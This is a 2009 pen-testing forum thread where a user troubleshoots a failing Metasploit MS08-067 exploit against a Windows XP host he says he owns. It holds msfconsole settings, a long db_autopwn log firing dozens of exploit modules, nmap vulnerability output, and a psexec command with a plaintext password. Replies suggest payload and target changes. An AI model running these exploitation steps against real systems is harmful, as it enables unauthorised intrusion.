.

Question when exploit target via metasploit ms08-06_netapi

<<

raymond hua

Newbie
Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Thu Dec 17, 2009 11:56 pm

Question when exploit target via metasploit ms08-06_netapi

My test target is 9.181.147.90, When I have set the settings and began to exploit, it appeared below error information: Exploit failed: Connection reset by peer. 
After the first attempt, I tried to exploit it again. Then the error information is exploit failed: the connection was refused by the remote host (9.181.147.90:445).
At the same time the port 445 was closed.


msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set

Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                            Value
  ----                            -----
  ConnectTimeout                  10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          true
  DCERPC::fake_bind_multi_append  0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio              rw
  DisablePayloadHandler            false
  EXITFUNC                        thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                false
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size        1024
  SMB::pipe_write_min_size        1
  SMBDirect                        true
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                      SSL3
  TCP::max_send_size              0
  TCP::send_delay                  0
  WfsDelay                        0
  lhost                            9.181.73.46
  payload                          generic/shell_bind_tcp
  rhost                            9.181.147.90
  target                          0

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP2 Chinese - Traditional (NX)
[*] Triggering the vulnerability...
[-] Exploit failed: Connection reset by peer
[*] Exploit completed, but no session was created.

Then I used another way, let Metasploit scan execute the exploit automatically via the command db_autopwn -p -t -e. Then the results as below, the exploitation stopped in the Started bind handler for a long time, at last the attempt was failed.

msf > db_autopwn -p -t -e
[*] Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
[*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445...
[*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139...
[*] Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25...
[*] Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139...
[*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
[*] (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
[*] Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
[*] (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...

[-] Exploit failed: The following options failed to validate: MAILTO.
[*] Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
[*] (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
[*] (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
[*] Started bind handler
[*] Connecting to SMTP server 9.181.147.90:25...
[*] Started bind handler
[*] Started bind handler
[*] Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25...
[*] Job limit reached, waiting on modules to finish...
[*] Connected to target SMTP server.
[*] Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
[*] Sending exploit ...
[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
[*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[*] (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[*] (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139...
[*] Started bind handler
[*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139...
[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[*] Started bind handler
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
[*] (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection timed out (9.181.147.90:445).
[*] (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[-] Exploit failed: can't convert nil into Integer
[*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[*] (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139...
[-] Exploit failed: can't convert nil into Integer
[*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection timed out (9.181.147.90:139).
[*] (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139...
[*] Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler

I'm appreciated if who can help me, thanks!
<<

3PIL0GU3

Newbie
Newbie

Posts: 38

Joined: Tue Aug 18, 2009 7:48 am

Post Fri Dec 18, 2009 2:37 am

Re: Question when exploit target via metasploit ms08-06_netapi

Did you try using a Reverse TCP payload instead of a bind shell payload you may have better luck
----------------------------
CEH
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Dec 19, 2009 1:24 am

Re: Question when exploit target via metasploit ms08-06_netapi

I sincerely hope you have permission to exploit that host.  There could be an IPS or AntiVirus product stopping your exploit. 
~~~~~~~~~~~~~~
Ketchup
<<

raymond hua

Newbie
Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Sun Dec 20, 2009 8:46 pm

Re: Question when exploit target via metasploit ms08-06_netapi

To: 3PIL0GU3

Follow your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.


Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                            Value
  ----                            -----
  ConnectTimeout                  10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          True
  DCERPC::fake_bind_multi_append  0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio              rw
  DisablePayloadHandler            false
  EXITFUNC                        thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                False
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size        1024
  SMB::pipe_write_min_size        1
  SMBDirect                        True
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                      SSL3
  TCP::max_send_size              0
  TCP::send_delay                  0
  WfsDelay                        0
  lhost                            9.181.73.46
  payload                          windows/shell/reverse_tcp
  rhost                            9.181.147.90
  target                          0

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP2 Chinese - Traditional (NX)
[*] Triggering the vulnerability...
[-] Exploit failed: Connection reset by peer
[*] Exploit completed, but no session was created.

after the attempt, I use another bash to check port 445, it was closed. before the attempt, port 445 are open....Maybe I should show my scan results from NMAP for you reference.

[size=100]Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间

NSE: Script Scanning completed.

Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)

Host is up (0.00s latency).

Not shown: 995 closed ports

PORT    STATE SERVICE

25/tcp  open  smtp

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-term-serv



Host script results:

|  smb-check-vulns: 

|    MS08-067: VULNERABLE

|    Conficker: Likely CLEAN

|    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[/size]
<<

raymond hua

Newbie
Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Sun Dec 20, 2009 9:22 pm

Re: Question when exploit target via metasploit ms08-06_netapi

To Ketchup

9.181.147.90 is owned by myself and all the tests have been approved by my manage.
I have uninstalled our firewall and I think there have no IPS in our internal network. But I do not know whether exist a limitation. For this case, I can exploit 9.181.147.90 via psexec and have administrator authority.


C:\>psexec \\9.181.147.90 -u hua -p basketball -e cmd.exe

PsExec v1.91 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Sincerely hope your reply!
<<

LSOChris

Post Thu Dec 24, 2009 12:49 pm

Re: Question when exploit target via metasploit ms08-06_netapi

my guess is that the return is bad or something like DEP is preventing code execution. try manually setting the target.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software